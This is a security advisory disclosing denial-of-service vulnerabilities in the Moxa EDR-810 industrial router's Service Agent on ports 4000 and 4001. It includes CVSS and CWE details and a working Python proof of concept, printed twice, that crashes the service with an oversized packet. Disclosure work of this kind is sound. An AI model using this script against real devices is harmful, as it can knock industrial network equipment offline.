Exploitable denial of service vulnerabilities exists in the Service Agent functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted packet can cause a denial of service. An attacker can send a large packet to 4000/tcp and 4001/tcp to trigger this vulnerability.
Moxa EDR-810 V4.1 build 17030317
https://www.moxa.com/product/EDR-810.htm
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE-20 - Improper Input Validation
The Moxa EDR Service Agent listens on port 4000 (tcp/udp) and 4001 (tcp). Moxa MXconfig, a Windows program, interacts with the EDR via the ServiceAgent. Sending large amounts of random data to these ports causes a crash.
In order to crash port 4000 (both TCP & UDP) a large packet needs to be sent to tcp/4000. This causes a consistent crash.
In order to crash port 4001 a large packet needs to be sent to tcp/4001. The crash does not always occur on the first try so an attacker may need to run this attack multiple times in order to cause a crash.
This python script will crash the Service Agent
import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close
import socket
host = '192.168.127.254'
port = 4000
packet = "\x00" * 5000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(packet)
data = s.recv(1024)
s.close